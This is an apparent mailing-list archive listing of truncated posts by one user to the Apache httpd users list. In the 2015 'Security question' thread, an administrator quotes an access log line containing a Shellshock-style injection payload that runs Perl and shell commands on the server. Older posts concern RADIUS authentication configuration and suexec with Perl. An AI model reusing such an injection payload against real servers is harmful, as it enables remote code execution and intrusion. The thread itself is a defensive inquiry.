Re: [users@httpd] Security question

2015-07-03 Thread Victor Sterpu
. There is no gravity. The Earth sucks. *Von:* Victor Sterpu [vic...@casnt.ro] *Gesendet:* Donnerstag, 2. Juli 2015 14:29 *An:* users@httpd.apache.org *Betreff:* **SPAM?** Re: [users@httpd] Security question [wd-vc] In the end the attack

[users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] GET /phppath/cgi_wrapper HTTP/1.1 404 280 - () { :;};/usr/bin/perl -e 'print \Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\;system(\cd /var/tmp/ ;cd

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
says so), you can see that attempt was not successful. - Y Sent from a gizmo with a very small keyboard and hyperactive autocorrect. On Jul 2, 2015 8:00 AM, Victor Sterpu vic...@casnt.ro mailto:vic...@casnt.ro wrote: Hello A hacker attacked a apache2 web server by HTTP injection

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
Yes. On 02.07.2015 21:16, David Grant wrote: Cgi module in php? Sent from my iPad On Jul 2, 2015, at 5:00 AM, Victor Sterpu vic...@casnt.ro wrote: Hello A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300

Re: [users@httpd] Security question

2015-07-02 Thread Victor Sterpu
On 02.07.2015 17:55, Kurtis Rader wrote: On Thu, Jul 2, 2015 at 5:00 AM, Victor Sterpu vic...@casnt.ro mailto:vic...@casnt.ro wrote: A hacker attacked a apache2 web server by HTTP injection. The log show what he has done: 62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] GET

[EMAIL PROTECTED] apache 2.0.61 and mod_auth_xradius 0.4.6

2007-12-11 Thread Victor Sterpu
I use the folowing configuration: Directory /usr/local/apache2/htdocs/html/plati AuthType basic AuthName Ambra-SectiunePrivata AuthXRadiusAddServer 192.168.250.99:1900 secret AuthXRadiusTimeout 2 AuthXRadiusRetries 1 require valid-user AddHandler cgi-script .cgi Options +ExecCGI Allow from all

Re: [EMAIL PROTECTED] perl and suexec

2006-01-28 Thread Victor Sterpu
end of script headers. Suexec gives no error, execution is succesfuly as suexec can see. Suexec log sais just this: [2006-01-28 11:56:56]: info: (target/actual) uid: (test/test) gid: (test/test) cmd: perl Thank you. Victor Sterpu wrote: I configured apache suexec with php. Now I want to do

[EMAIL PROTECTED] perl and suexec

2006-01-27 Thread Victor Sterpu
I configured apache suexec with php. Now I want to do the same with apache suexec and perl, but I get a Premature end of script headers. This is the only error in the logs. It a make su with the user of the virtual domain, I can execute succesfuly the perl program(and the result is a html